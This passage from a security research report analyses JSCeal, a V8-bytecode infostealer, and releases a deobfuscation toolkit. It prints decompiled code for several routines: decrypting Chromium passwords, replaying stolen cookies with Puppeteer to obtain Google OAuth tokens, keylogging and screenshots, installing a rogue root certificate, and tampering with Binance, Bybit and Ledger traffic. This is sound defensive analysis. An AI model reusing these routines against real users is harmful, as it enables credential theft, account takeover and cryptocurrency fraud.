Login Data  database and extracts the origin, username, and encrypted password: SELECT origin_url, username_value, password_value FROM logins Original snippet [ here ]. After decryption, the malware produces a structured credential record: { origin: row["origin_url"], username: row["username_value"], password: decryptedPassword } The decryption implementation supports multiple Chromium data formats. Values prefixed with  v10  or  v11  are decrypted using the key recovered through DPAPI. Values prefixed with  v20  use the App-Bound key. Records without one of these prefixes are passed directly to the native DPAPI unprotection routine, optionally under the security context of the browser’s user session. The responsible code: function func_decryptPassword_0x10000af0f(a0, a1, a2, a3) { r1 = Scope[1930][27]["startsWith"] if (r1(a0, "v10")) r1 = Scope[1930][27]["startsWith"] || (r1(a0, "v11")) { if (!a1) { ACCU = Error ACCU = Error("DPAPI key is required") } r4 = a0["subarray"] r4 = r4(3) return func_decryptAesGcm_0x10000af16(r4, a1) } r1 = Scope[1930][27]["startsWith"] if (r1(a0, "v20")) { if (!a2) { r2 = "AppBound key is required" ACCU = Error ACCU = Error(r2) } r4 = a0["subarray"] r4 = r4(3) return func_decryptAesGcm_0x10000af16(r4, a2) } if (a3 == null) { ACCU = Error ACCU = Error("Session id is required") } return func_decryptData_0x10000af12(a0, a3) } This gives JSCeal access not only to raw browser files, but to usable records containing session cookies, usernames, and decrypted passwords. The data can be saved through the malware’s collection handlers, consumed by platform-specific modules, or reused immediately by another part of the browser component. One of those uses goes beyond passive credential collection. From stolen browser data to active session replay The browser router contains a dedicated operation named  saveAndroidTokens : r9 = new {"start": null, "saveProfiles": null, "saveExtensions": null, "saveAndroidTokens": null, "openLink": null} [...] r10 = (global_Nh["procedure"])["mutation"] r9["saveAndroidTokens"] = r10(func_processBrowserCookies_0x1000006d5) [...] Original snippet [ here ]. The implementation uses Puppeteer together with  puppeteer-extra . Before launching the browser, it registers a set of core and stealth plugins. It also uses  ghost-cursor  to perform some of the page interactions. The malware does not download a separate Chromium build. It launches one of the browsers already installed on the machine, using the executable paths and profiles discovered by the browser module. The launch configuration explicitly selects Puppeteer’s headless shell mode: options["executablePath"] = browserExecutable options["headless"] = "shell" browser = puppeteer.launch(options) You can see the full function [ here ]. JSCeal first creates a page and injects cookies recovered from the victim’s browser profile: page = await browser.newPage() await page.setCookie(...recoveredCookies) It then opens Google’s Android authentication endpoint: https://accounts.google.com/o/android/auth?return_user_id=true You can see the full function [ here ]. The navigation waits until network activity has settled: await page.goto( "https://accounts.google.com/o/android/auth?return_user_id=true", { waitUntil: "networkidle2" } ) You can see the full function [ here ]. Once the page is loaded, the malware enumerates the Google accounts displayed in the current session: const elements = await page.$$("div[data-email]") Original snippet [ here ]. For each recovered email address, it queries the passwords previously extracted from browser storage. It then selects the corresponding account using a selector built from the email address: await cursor.click( "div[data-identifier=\"" + email + "\"]" ) You can see the full function [ here ]. The automation handles multiple branches of Google’s authentication flow, including: /signinchooser /signin/confirmidentifier /signin/challenge /signin/challenge/selection /signin/challenge/pwd /oauth2/programmatic_auth You can see the full function [ here ]. When a password challenge is reached, JSCeal iterates over the candidate passwords associated with that account: for (password of recoveredPasswords) { console.info("Trying password " + password) await page.type( "input[type='password']", password ) // Continue the authentication flow and inspect the result. } You can see the full function [ here ]. An invalid password is detected through the state of the password input. A successful attempt is expected to lead either to the programmatic OAuth endpoint or to another supported challenge stage. After authentication, the malware reads the browser’s cookies and searches specifically for: user_id oauth_token The result is returned together with the password that produced it: { userId: userIdCookie, token: oauthTokenCookie, password: successfulPassword } Finally, the token is saved through the malware’s Google handler with its scope explicitly marked as  ANDROID : await google.saveOAuthToken.mutate({ userId: userId, scope: "ANDROID", value: token }) You can see the full function [ here ]. This changes the nature of the browser-stealing capability. JSCeal does not just copy cookies and password databases for later examination by the attacker. It can reconstruct a browser session, replay the victim’s cookies, correlate Google accounts with passwords recovered from the same host, automate authentication challenges, and obtain a fresh OAuth token. The use of stealth plugins and  ghost-cursor  suggests an attempt to reduce obvious automation fingerprints and make interaction with the login pages resemble ordinary browser activity. It does not guarantee that the procedure succeeds against every version of Google’s authentication flow, but the deobfuscated code clearly shows that the complete workflow was implemented. Not every browser-related operation uses Puppeteer. A separate  openLink  handler launches an installed browser directly with the selected  --user-data-dir  and  --profile-directory . Puppeteer is used for the more involved operation where JSCeal needs to inject cookies, navigate between authentication stages, interact with page elements, and retrieve the resulting authentication state. Spying functionality The function labeled  func_initializeScreenCaptureModule_0x10000d2e3  is indeed responsible for setting up screenshot capture, but its scope goes beyond that. Inside we also find a keylogger and handlers for enumerating and manipulating visible windows. The inner functions carry more granular labels —  func_takeScreenshot_0x10000d2d1 ,  func_getVisibleWindows_0x10000d2d3 ,  func_controlWindow_0x10000d2d4 ,  func_initKeyboardCapture_0x10000d2e1  — and taken together they reveal what the parent name understates. Examining each function manually confirms that this is a broader surveillance module. function func_initializeScreenCaptureModule_0x10000d2e3() { Scope[7][10] = func_c_0x10000d2c7 r5 = func_initializeNativeModule_0x1000054f8["exports"]() global_K5 = func_interopRequireWildcard_0x10000317a(r5) r5 = func_initKeyboardModule_0x10000d2c6["exports"]() global_e6 = func_interopRequireWildcard_0x10000317a(r5) ACCU = func_requireCluster_0x10000317e() ACCU = func_noopDispose_0x10000676f() ACCU = func_initClusterModule_0x10000cdef() ACCU = func_initializeObservableAbortError_0x100006649() ACCU = func_noopSetup_0x100006778() ACCU = func_noopHandler_0x10000673e() ACCU = func_unknown_0x10000590f() ACCU = func_initializeBufferCheck_0x10000701a() r6 = global_e6["keyboard"]["start"] r5 = r6["bind"] r5 = r5(global_e6["keyboard"]) r7 = global_e6["keyboard"]["stop"] r6 = r7["bind"] r6 = r6(global_e6["keyboard"]) global_TL = func_createAbortableStream_0x1000004e4(r5, r6) r2 = (func_createInstance_0x100000ab5())["router"] r4 = new {"screenshot": null, "windows": null, "keydown": null} r7 = (func_createInstance_0x100000ab5())["procedure"] r6 = r7["input"] r9 = global_fi["number"]() r8 = r9["optional"] r8 = r8() r6 = r6(r8) r5 = r6["query"] r4["screenshot"] = r5(func_takeScreenshot_0x10000d2d1) r5 = (func_createInstance_0x100000ab5())["router"] r7 = new {"visible": null, "control": null, "flash": null} r9 = (func_createInstance_0x100000ab5())["procedure"] r8 = r9["query"] r7["visible"] = r8(func_getVisibleWindows_0x10000d2d3) r10 = (func_createInstance_0x100000ab5())["procedure"] r9 = r10["input"] r11 = global_fi["object"] r13 = new {"handle": null, "command": null} r13["handle"] = global_fi["number"]() r17 = func_getObjectKeys_0x1000004ce(global_K5["windowCommands"]) r13["command"] = func_enumValue_0x100000542(r17) r11 = r11(r13) r9 = r9(r11) r8 = r9["mutation"] r7["control"] = r8(func_controlWindow_0x10000d2d4) r10 = (func_createInstance_0x100000ab5())["procedure"] r9 = r10["input"] r11 = global_fi["number"]() r9 = r9(r11) r8 = r9["mutation"] r7["flash"] = r8(func_flashWindow_0x10000d2d5) r4["windows"] = r5(r7) r6 = (func_createInstance_0x100000ab5())["procedure"] r5 = r6["subscription"] r4["keydown"] = r5(func_initKeyboardCapture_0x10000d2e1) global_LL = r2(r4) ACCU = func_runIfWorkerPool_0x10000000b(("sessions"), func_initWorkerSocketLL_0x10000d2e2) return undefined } Interception proxy and targeted traffic manipulation A common technique used by banking trojans is to install a local proxy and inject or modify web content in selected services. JSCeal follows a similar pattern: the recovered code shows proxy setup, certificate generation and installation, and service-specific request and response modification. There is a function that runs the local proxy: function func_setLocalProxy_0x10000be31(a0) { r2 = ("127.0.0.1:" + Scope[1139][4]) return func_setProxyLoop_0x100000a41(a0, r2) } We can find a function that generates a certificate: function func_generateKeyPairAndCertificate_0x10000072c() { r6 = (require("crypto"))["generateKeyPairSync"] r7 = "rsa" r8 = new {"modulusLength": 2048, "publicKeyEncoding": null, "privateKeyEncoding": null} r9 = new {"type": null, "format": null} r9["type"] = "pkcs1" r9["format"] = "pem" r8["publicKeyEncoding"] = r9 r9 = new {"type": null, "format": null} r9["type"] = "pkcs8" r9["format"] = "pem" r8["privateKeyEncoding"] = r9 r6 = r6(r7, r8) r3 = r6["privateKey"] r4 = func_generateSelfSignedCertificate_0x10000071d(4096) r6 = new {"privateKey": null, "certificate": null} r6["privateKey"] = r3 r6["certificate"] = r4 return r6 } Then, it installs a locally generated, attacker-controlled root certificate onto the victim machine, first dropping it as a temporary file, and then using  certutil  to add it to the local store. function func_installCertificate_0x100000a3e(a0) { r6 = <closure> r7 = <this> ACCU = func_n_0x100000a3c try { r8 = global_UK["tmpName"]() r7 = await r8 r8 = _GeneratorGetResumeMode(Scope[10601]) if (!r8 === 0) { ACCU = r7 } r3 = r7 ACCU = r3 try { r10 = (require("fs/promises"))["writeFile"] r11 = r10(r3, a0) r10 = await r11 r11 = _GeneratorGetResumeMode(Scope[10601]) if (!r11 === 0) { ACCU = r10 } r13 = "certutil" r15 = new [0, "-f", 0, 0] r15[0] = "-addstore" r15[2] = "root" r15[3] = r3 r11 = r2 r11 = func_spawnChildProcess_0x100000706(r13, r15) r10 = await r11 r11 = _GeneratorGetResumeMode(Scope[10601]) if (!r11 === 0) { ACCU = r10 } ACCU = -1 r8 = -1 r7 = -1 } catch { r8 = ACCU r7 = 0 } r11 = (require("fs/promises"))"rm" r10 = await r11 r11 = _GeneratorGetResumeMode(Scope[10601]) if (!r11 === 0) { ACCU = r10 } ACCU = null if (r7 === 0) { ACCU = r8 } r8 = undefined ACCU = r8 return r8 } catch {} r7 = ACCU ACCU = null ACCU = Scope[10602] return Scope[10602][2] } The proxy is not limited to passive interception. The recovered code contains dedicated handlers that modify selected requests and responses for specific services. A configuration function exposes separate overrides for Binance, Bybit, and Ledger, as well as generic handlers for replacing HTML, blocking hosts, and clearing selected cookies. function func_applyInputOverrides_0x10000be34(a0) { ACCU = a0["input"]["binance"] r2 = a0["input"]["binance"] if (!a0["input"]["binance"] == undefined) { ACCU = r2["overrideQR"] } else { ACCU = undefined } if (ACCU) { r2 = global_Nm["overrideQR"] r4 = a0["input"]["binance"]["overrideQR"] ACCU = r2(r4) } else { ACCU = global_Nm["disableOverrideQR"]() } ACCU = a0["input"]["bybit"] [...] You can see the full function [ here ]. For Binance, JSCeal intercepts the QR-login response and replaces the returned  qrCode  value with a configured value. function func_appendQrCode_0x1000009f1(a0) { if (a0["json"]["success"]) { r2 = a0["json"]["data"] r2["qrCode"] = Scope[10627][2] r2 = new {"json": null} r2["json"] = a0["json"] return r2 } return undefined } The Bybit handlers go further. One forwards intercepted verification components through the same  global_iB  network client described earlier and removes them from the intercepted response. function func_sendBybitCodes_0x100000a09(a0) { Scope[10623][3] = func_x_0x100000a07 r4 = Object["entries"] r6 = a0["json"]["component_list"] r4 = r4(r6) r3 = r4["map"] r1 = r3(func_joinWithColon_0x100000a08) if (r1["length"]) { r5 = global_iB["notifications"]["send"] r4 = r5["mutate"] r7 = r1["join"] r6 = ("Bybit codes\\n" + r7("\\n")) r4 = r4(r6) r3 = r4["catch"] ACCU = r3(func_pushError_0x100000142) } a0["json"]["component_list"] = {} r3 = new {"json": null} r3["json"] = a0["json"] return r3 } Another converts a successful  pass  result into a new  challenge  with a randomly generated risk token. function func_injectRiskToken_0x100000a0d(a0) { if (!a0["json"] == undefined) ACCU = a0["json"]["result"] r4 = a0["json"]["result"] && (!a0["json"]["result"] == undefined) { ACCU = r4["risk_token_type"] } else { ACCU = undefined } r4 = ACCU if (r4 === "pass") { r2 = a0["json"]["result"] r3 = "risk_token" r4 = (require("crypto"))["randomUUID"] r2[r3] = r4() r2 = a0["json"]["result"] r2["risk_token_type"] = "challenge" r2 = new {"json": null} r2["json"] = a0["json"] return r2 } return undefined } A Ledger-specific handler intercepts  /public_resources/analytics.min.js  from  resources.live.ledger.app  and substitutes a generated script that hides the existing React root and displays configured HTML in its place. function func_initErrorDisplay_0x100000a1a(a0) { ACCU = func_removeElement_0x100000a1c() Scope[10617][3] = func_buildErrorDisplayScript_0x100000a1e(a0) r4 = (global_Gm["createChild"]())["get"] r6 = "resources.live.ledger.app" r7 = "/public_resources/analytics.min.js" r8 = new {"response": null} r9 = new {"full": null} r9["full"] = func_createFullBody_0x100000a19 r8["response"] = r9 ACCU = r4(r6, r7, r8) return undefined } Other utility handlers can return arbitrary HTML with a  200  response while stripping CSP and content encoding, return an empty  403  response for selected hosts, or clear selected cookies in intercepted requests and responses. Cryptocurrency account and balance collection JSCeal contains multiple handlers targeting cryptocurrency platforms. One class of handlers intercepts account data and records cryptocurrency balances. For example, Kraken is one of the targeted services. The snippet below shows the corresponding initialization. function func_initKrakenRouter_0x10000bc3e(a0) { Scope[1246][6] = func_a_0x10000bc35 ACCU = a0 if (a0) { ACCU = a0["__importDefault"] } if (!ACCU) { ACCU = func_interopRequireDefault_0x10000bc3a } r1 = ACCU r7 = Object["defineProperty"] r10 = "__esModule" r11 = new {"value": <true} ACCU = r7(a0, r10, r11) r10 = func_initModule_0x10000ba72["exports"]() Scope[1246][7] = r1(r10) r2 = func_initJsonTransformerModule_0x10000ba7b["exports"]() r3 = func_initializeRouterBridgeModule_0x10000ba61["exports"]() r4 = "iapi.kraken.com" r7 = r3["Router"] r5 = r7(r0) r7 = r5["get"] r10 = "/api/internal/account/balance/history" r11 = new {"response": null} r12 = new {"full": null} r13 = r2["jsonTransformer"] r12["full"] = r13(func_saveKrakenBalance_0x10000bc3d) r11["response"] = r12 r8 = r5 ACCU = r7(r4, r10, r11) a0["default"] = r5 return undefined } function func_saveKrakenBalance_0x10000bc3d(a0) { Scope[1247][3] = func_C_0x10000bc3b r4 = a0["json"]["result"]["historical_balances_per_asset_category"] r3 = r4["map"] r1 = r3(func_getLastHistoricalBalance_0x10000bc3c) r4 = Scope[1246][7]["default"] r3 = r4["saveBalance"] if (!r4["saveBalance"] == undefined) { r5 = new {"source": null, "name": null, "value": null} r5["source"] = "EXCHANGE" r5["name"] = "KRAKEN" r5["value"] = r1 ACCU = r3(r5) } else { ACCU = undefined } return undefined } function func_getLastHistoricalBalance_0x10000bc3c(a0) { r0 = a0["historical_balances"] return r0[(a0["historical_balances"]["length"] - 1)] } We extracted platform identifiers from all  saveBalance  calls, obtaining the following list of targets: UBITEXPAXFULKRAKENHTXCOINSPHTOKOCRYPTOOKXKCEXHATACOINHUBREMITANONOONESFORTUNO_MARKETSGATEIOBYBITPOLONIEXMEXCCSGOEMPIREFMCPAYBINANCEPIONEXKUCOINI3QDIGIFINEXASCENDEX JSCeal evolution The last JSCeal payload we observed using V8  10.2.154.26-node.25  was  0d1fce0cb2b9dec26a10f0822aeffb19 , associated with campaigns starting at the end of October 2025. By that time, we could already see the authors making incremental changes intended to complicate analysis. Earlier, the JavaScript launcher had been renamed from  preflight.js  to  preload.js  and, along with this change, was itself obfuscated using the same  javascript-obfuscator . The payload was also renamed to  app.js . Although its contents were still a V8 code cache rather than JavaScript source, the new name made it blend in better with ordinary application files and rendered hunting based on the  .jsc  extension ineffective. These changes were still relatively minor and did not require modifications to our analysis toolkit. A more significant update appeared in campaigns starting early November 2025. The bundled Node.js runtime was upgraded, bringing V8 to  13.6.233.10-node.28 . In our experiments, code caches produced for this runtime proved considerably more sensitive to the exact runtime build and snapshot configuration, making it more difficult to obtain a compatible standalone V8 disassembler. However, once we were able to recover and decompile the bytecode, the overall payload structure remained familiar. We could recognize the same  javascript-obfuscator  patterns, including the string-decoding infrastructure, proxy indirection, and control-flow flattening used by the earlier generation. The authors introduced another obstacle by adding an AES-256-CBC encryption layer around the Brotli-compressed payload. The first encrypted payload we observed was generated on  2025-11-11  ( 581e2e2265d0c1509b3799c5a9039374 ). The AES key is not stored in the malware bundle itself. Instead, another stage of the deployment chain provides it through an environment variable. Recovering the underlying V8 code cache therefore requires obtaining the corresponding key from the surrounding infection chain, which is not always possible when only an isolated bundle or payload is available. Protecting a payload with an encryption key supplied by an earlier deployment stage is an effective anti-analysis technique, consistent with patterns seen in other mature malware frameworks. Alongside these changes in payload protection, we also observed campaigns targeting macOS; one example is  de10c6b3dc4619f59bc9c80a0aa15e6a . Taken together, these developments show that the JSCeal authors are investing both in making the payload harder to analyze and in broadening its platform coverage. With campaigns continuing into recent months, the changes indicate that JSCeal remains under active development. Conclusions JSCeal combines two forms of analysis friction: a version-specific compiled V8 format and several layers of JavaScript obfuscation applied before compilation. Neither makes the malware impossible to reverse, but together they move it outside the workflows that analysts normally rely on. Several conclusions emerged from this work. Format choice creates asymmetric analysis cost.  Attackers do not need a custom compiler or a novel virtual machine to obtain meaningful protection. They can combine the Node.js ecosystem, an off-the-shelf obfuscator, and V8 code caching to produce capable malware quickly. The defender, meanwhile, has to deal with version-sensitive bytecode, immature tooling, and a large pseudocode corpus before reaching the application logic. Layered obfuscation needs to be addressed with layered deobfuscation.  JSCeal’s transformations depend on one another. Recovered strings expose dictionary keys and dispatcher order; those expose proxy relationships; proxy cleanup reveals simple operations and direct calls. Reconstructing the script in one go was not possible. We had to isolate each transformation and undo them by a narrow, ordered sequence. Static recovery can be practical without producing runnable source.  View8 pseudocode is not the original JavaScript, and our pipeline does not attempt to make it executable. Nevertheless, the recovered representation is sufficient for ordinary analytical work: following logic, locating capabilities, extracting artifacts, comparing samples, and validating behavior against runtime observations. LLM-assisted naming is useful as navigation, not as evidence.  Dependency-aware renaming can make very large recovered codebases substantially easier to browse, especially after deterministic deobfuscation has already exposed meaningful strings and calls. Our evaluation also showed why the labels must remain hypotheses: different models often choose different levels of abstraction, and even strong models can produce confident but incorrect names. The function body, strings, APIs, paths, and data flow remain the evidence. The recovered JSCeal code exposes a broad capability set.  The analyzed payloads include browser and credential theft, cryptocurrency-focused collection, Telegram session theft, keyboard capture, screenshots, and a local HTTPS interception proxy capable of installing an attacker-controlled certificate. Static recovery makes it possible to examine not only behavior observed during one run, but also branches that may not execute in a particular environment. Version sensitivity remains a tooling challenge.  The move from the V8  10.2.154.26-node.25  generation to  13.6.233.10-node.28  demonstrates the cost of relying on an internal, version-specific format. A new runtime generation can require renewed work at the disassembly layer even when the malware’s higher-level structure and obfuscation remain recognizable. The main result is therefore not perfect source reconstruction. It is a repeatable path from a compiled, obfuscated V8 payload to code that can be inspected and compared again. We released version 1.0 of the toolkit [ 7 ] as a reference implementation of that methodology and as a starting point for analysts facing similar V8-based payloads. The current end-to-end setup targets V8  10.2.154.26-node.25 . We are planning to add support for V8  13.6.233.10-node.28  in future releases. The recent JSCeal changes show that the problem is still moving. Payload names, runtime versions, encryption layers, and target platforms can change while the core analysis challenge remains the same: recover enough structure to turn an opaque compiled artifact back into evidence. Appendix – A Listing of the most important changes introduced in the View8 code during the development of the deobfuscation pipeline. Serializing output By default, View8 emits only a text representation of the decompiled output. As part of our pipeline, we needed to apply multiple transformation passes. Working with the decompiler’s internal representation was much more convenient than parsing raw text. This is why we introduced an additional output format: a serialized object graph representing the internal decompilation state. Python’s pickle format was chosen for convenience. The deobfuscator loads the pickled input and operates directly on the reconstructed View8 objects. Each pass can work independently, reading the serialized state produced by the previous pass. Splitting output Another difficulty in JSCeal analysis was the significant size of the output, which reached up to 47 MB because the payload included a large number of bundled modules. As a result, finding the code that belonged to the malware itself was quite challenging. To make the output easier to navigate, we added to the View8 decompiler the ability to split it into separate files, each representing a single tree of function dependencies. The tree can be constructed using different relationship types: the declarer hierarchy ( declarers ), direct function calls ( calls ), or broader function references ( references ). For call- and reference-based trees, the analyst can also control the traversal depth and separate larger branches into individual files. This makes it possible to extract a focused subsystem around a selected root without printing the entire payload. Normalization of the generated function identifiers Each function name generated by the View8 decompiler contains a hexadecimal suffix derived from address values present in the V8 disassembly. These values correspond to live heap addresses used by V8 and are not stable across different runs. Because of ASLR, disassembling the same JSC file twice may therefore produce different function identifiers. The relative object layout may also differ between V8 or disassembler builds, making simple address rebasing insufficient. For reproducible output, we added the  --normalize  option. It replaces the address-derived suffixes with deterministic identifiers based on the order in which functions are encountered while parsing the disassembly. A fixed virtual base is added to the parse index, preserving the familiar  func_<name>_0x<value>  format while making the identifiers independent of the original heap layout. The mapping between the original and normalized function names can optionally be exported to a CSV file using  --normalize-map . Function and line metadata We introduced a  metadata  field to each line and function. This lets us pass information between each layer of the deobfuscator and reduces the burden of reparsing. For example, once we parse a line and enumerate all the registers it references, this information can be stored in the line object for further use. Similarly, metadata can be added to a function. As a result, even after deobfuscating a function we don’t lose the information about what type of obfuscation was applied to it (for example: Control Flow Flattening). We can filter the functions by the metadata tags, and display them selectively. Hiding functions In past releases, View8 allowed lines to be hidden by setting the visibility field in the line object. While this feature is very useful, it may not be enough when we are dealing with obfuscated code. Sometimes there is a need to hide entire functions, not only selected lines. For example, we will encounter multiple proxy functions, of different types, that were introduced only for the purpose of complicating the code flow. Sometimes a single call is done by a rabbit-hole of proxies, that have to be understood and then removed, to make the call direct. There are also many small functions whose only role is to implement a single arithmetic operation. During the deobfuscation process, those functions will be parsed and the calls to them will be replaced by the explicit operations. Once the functions are resolved, they can be safely hidden. Changed representation of globals The original View8 output displays global variables by the names with which they were declared. In the case of obfuscated code, those names are intentionally made meaningless. Sometimes they are one or two characters long. We also encountered cases in which the names of globals were identical to the names of registers used by the standard JSC code ( r{number} ) and therefore, understanding what they really represent required broader contextual analysis. In order to make the meaning more explicit, and the output easier to parse, we appended the  global_  prefix to each global variable. Once the globals are parsed, their explicit definition in the start function ( DeclareGlobals ) is hidden. Example: Before: ACCU = DeclareGlobals(["oQ", "kg", "xQ",...]) [...] oQ = Object["create"] kg = Object["defineProperty"] xQ = Object["getOwnPropertyDescriptor"] After: global_oQ = Object["create"] global_kg = Object["defineProperty"] global_xQ = Object["getOwnPropertyDescriptor"] Appendix – B The analyzed files Note: The tests were performed on 23 different payloads using V8  10.2.154.26 . During two unattended test runs, documented in the repository [ 8 ] (directory  sessions_23_samples ), all filters completed without exceptions and produced output suitable for code-level analysis. The collected logs show the details of each run, along with the timing and evaluation. The appendix lists one additional, older payload beyond the 23-sample main evaluation corpus. Its deobfuscation was successful, but it uses an earlier, simpler string-obfuscation variant handled by  deobf_str1.py , so it was not included in the automated pipeline evaluation. JSC files (original, Brotli-compressed) with corresponding bundle ( build.zip ): md5 (jsc) sha256 (jsc) sha256 (bundle.zip) 03f4e47b9c2283c32bb8f8f042ce6e41de213ebc44c614d0b2324787e267183dbbbbb19e1ad866435a322ee00e24e7b6c77b3b7a507162bfc03cfeb8ef18d5ee7017e8fcbd6d7e005f986a3c967b8d450b8015cbb1ffdc6efe6a306ff5b1115f4757f3d26bc7110e9c7f4da8050afc2ed661cd92aec9cf7d301d9b9b24e0b668b90e3aaae14e7787e5ea4a6d4beee672049bd5eb05427f2c80b64f605860d2b81026743185dfa10e9ddc21b5a4c578d5212d21ed1c4b5bd9b9104e04f2876842b99cd17def3591df72781891d584dca055ee2359b12fbce928532d1d4efcfbbbd63340502d0107466c803d6517b44437201f28b5e62e52e269757930f941c774f720d6f6baebd4ef76df978f2678387385ee2d20a37423e7957c2341fe46f9cab3f76851a8e55a967029be7ffe4c15afd63656d6946a3df77206455e5ac28ea12fe27eb8c99626e8c02e4bfd02aca9628d389f56c5b71d194bddd5b6ce5906e7e22730034ad882606cc8ae701011bf8c67e3d7bcdf4cfd25750425ac0682e0ed98b3cb473448696fb79bf311fcdb18cd376ec4dbc3363fa7131367e4c6327a462ef1ea37a941330a79a3056461e61992864e6e38c0f68cbb626ebf1f96e362c599b8124c2a64d26567f19a44618144b1d6a7501a5892918f0120a496f983a0f2462195f7f8033df7371e899fe9bc51de62ba626bce09db5f8750938edced3768b401084a7d6584cd6ff9d53d2517781ddc561df51d27ed3a99cb916bf08452c901956778c26709e69705cbdf77f74816499184635d56a9827d2059256a35e530c12ac711b4ceaa17a4e48b16fca7dabd615e4eaf35bb65fe9131ceac1687095add2bb7316be55446aebfa31d05e57e936eb9a18d5d9c20d60d87493100d05fe6533d0b93ea03cd5bab4eec0f0ebadd03484da78b0fef35711f86876f7c1c77264b8e4295d7393369379c384c05337ec5684aabefe516539cda48c65cb08014e6eb645b4f1e668d159fe0c18cf74eb40768ac84a8470d1f365f0bb2f37b6256d50c31453e74a3b763c7aea550b4f5f194e7656226012b243221eb93fa22da118ef6c670e65765d10a5ca0205a6ece3a3e6c7c730b0a8534c5adef4a3cbf06eb9c6e023b9b3097a2dba311cb06a91fe2595f071a36c0a79ddce92824a49fd8e9bd048b87cabb635671073402365afc342a3d800b7dbdcb6874e29ddd2e9a1313f3d82b323e89a720c632c708098a7ca0e97b659fa5c93af29c4e11d8c8be43705882f8215c7e68f4a6b656b7dc6638982a6625c662ce6d6a05330eefbfde2637ac6b498ec73d32860202b6a6ff8d21f8b5216c3903e066136f9d69ef2969955a788fb3e6acb2024601eba0ba484091ff3d31b38e76ccaca6f38168b4fdd9cbdedd8efa7e65fe6090240e281bd3152a6feb5fe810cb5b34c8fd07c7eca301b32ef2d3b86290828d67edaad8444db811f20baf105a6d4dc10b2bfefd75e917245523caf8bfc90e4300b8a18c3fe3a4badbe44c106830e7432d8eea227857a790ec917f3e73b2e0ebea3eaffa3685e0a162d10fde388282060d9e35b173b743676916b2dad3f88b7f6870f83eb1ad852b7f7e1f5acba97db6d514e4b35ba0601c5269697e8ab3bb99d097db25ec7e744645948c674f58b157a7319b564bb774e7aeb35135d615511838e4a553fe7ea9e94759d064dfaaef30c057b832c79996c35e899b5359dc99501ef2a4667d265e9b032f76dc28c97437a463965e2168d20e5c385a024ae97242be3b1b954f845f7a87a1411c47830f81a2b54f47ec2cf741e2a0d5b4137135cf121e3ea07b1c81fe11088abffe0d13d3b93ca3469045e4cebbee25b3631e6bba13880f04b7c8acac253609f803f69bde280adbd4e584ed26a01affac9721db8c5730275d385f084b422ae26687982d924ffebef6fbf2d9d4335095b39a0bad021f33e08df042b02d3267faee7bbc3e3080dda295c35b464dd60718347a39f174c97947649b3f1de55e8409ff805e808f2101e5953a956e9ee99fe27ae65977287bdfb7b0e15fd3603f85b73c3d732bb6bff8b9088cc0dcbadb35eea0802056324f1b6295cb9277c627559615f60ea3cc1c65eb8fe6d77bb85fe6b455503193eab02310a873fccadd332ee711a90b5ece5380e1acaed56827e8d51b0efeb1d988b7bc11014ccc9fdff141fc16425d659f553f6cc6946872499667acdaba94e9975e8e03fa13bae7f0f93f165f42226aeecea3af5a4e0111bdfb7e0d1fce0cb2b9dec26a10f0822aeffb195b4edd9bffdd7909b8b432eacd463d59eb23eba151c9e218161ab15dd72d55ed2d42aa747f7ebc3280b14d30c6b71043545888946d9d6acd6abbaf4545841462e8b5448b4f7b013e8c6191b20d3f829105db78bff1a48a674e70368b96a550a5f9f93271eb261ab63b36ee37e0e8b9f884db0663b6aa8df2ac04470288fd5528f5537fb89d78a2e01cabdce371a686e8fd4494c555adda2eb54b88f5c9c08801058ae4136e241f116d8c5b1a1cad15b53090797154539faa35706568fbd85d9b7e1c82cdcff73ac69fee3ba71d67353a062103f1bfae4f263d03b3b84e48d782 JSC files (original, Brotli-compressed) with corresponding unpacked versions: md5 (JSC original) md5 (unpacked) sha256 (unpacked) (unknown)91038aebe528a065c3e995a418db6826c288e79ed9d1fb654a341b92d878a3165a09fb21dfa826f3559b46738fdbbdeb03f4e47b9c2283c32bb8f8f042ce6e4113823095b8d31013ba41a5c98ce69b598b3ed808822479eb62d78d819db35362e4e79138ac82310d30e0c351a17992b60b8015cbb1ffdc6efe6a306ff5b1115f454fb012cdd0736e4ed41fabf0916f462cf2d22d1317df6c49171be61ef35c4f6c3da17785fa73e68aa95109075f79bd1026743185dfa10e9ddc21b5a4c578d5975319142460fc43e3dc5e495d2313c994191824bb5062622663e2434d2b749a8c936eb573aaac23594dee8dda304731201f28b5e62e52e269757930f941c77409dbfac09f9cafdbc7d225eb144f0e69742ad2dd3d2444bd3758b6e46dd76f9c43dfaae03bdffc3598ce7d8ab3cd3ac52fe27eb8c99626e8c02e4bfd02aca962c8db5e53572e68349c76107f03544491504345099ba4c77cbb4224101794e525f2bc9adb40904159195c17d7e345085e376ec4dbc3363fa7131367e4c6327a46a2aa25f0d5b23a2897576e4cf9596a7c11e85a8306057945accc65395b780377c07d4ec9ae52d78185554bf1957e3caa462195f7f8033df7371e899fe9bc51de2841170a19c028c16990cdcc6fd499bc43c57c60a8008e617b16dc6dab29372347ebe144f043200c106149c3106438ba499184635d56a9827d2059256a35e53030f23bb28ce56584f8f098ff0035b029cfdb3bb9edea8de7c7a70275a2b8689619276f1e5f2b8805e67ceab1ee252f6d533d0b93ea03cd5bab4eec0f0ebadd03cd7afa032d5f5be0db037edb617f438b6075cd41edb59c43c13aa3591e054cdb127b17bf34e036dae591244ea2f8868f68ac84a8470d1f365f0bb2f37b6256d5a6f5bb2b8a3e1abe332dd40e50d78aa3c13fcb214a576401cd624dacf248480c38b8bcbb85e5d3da52cc204a61395d146e023b9b3097a2dba311cb06a91fe2596626b8caf2734c83a93f78d31b703584395f4c1562a1a8caeba254ccbc7d278b8194795ff5ad3824cfc0c566273835f07b659fa5c93af29c4e11d8c8be437058469c60508d4470bc1cc5e4a70d0e7112192342a5e4fcfc5e8ec430427e1dfa773fd324e3d7215047f36f1114ef930f4e8fb3e6acb2024601eba0ba484091ff3de57f6ca6543616f75f7811273616fe470c72513efdae9785894b6e925590d0b59b652dda53b8cd882037a87e672a4a5aaf105a6d4dc10b2bfefd75e917245523a308fa1524c9d5b8dc55d2b296a2629b9f673e3b361f438e9986f2a7b2423d3d02dbecea0c220163566850ef6ab56626b2dad3f88b7f6870f83eb1ad852b7f7e576e94d705bd50811dc9525a45732bc359c9038227c634f4e512afaa98f2ca998b0aaac83437c218686c51acbda7873ed064dfaaef30c057b832c79996c35e89710cc97e64618c68ffca72ac405a48a188b1d75d330cf6be9a7f48cdfd51c48125a86f9bcb6bcb736fb8399e0617d680d5b4137135cf121e3ea07b1c81fe1108c605371a8caf11497f1879597292e3382c29b4089845b010428f8be48e62f165e0f7f8a48e58200629c6020c7ac2cab7e26687982d924ffebef6fbf2d9d433502477fd3e348c51b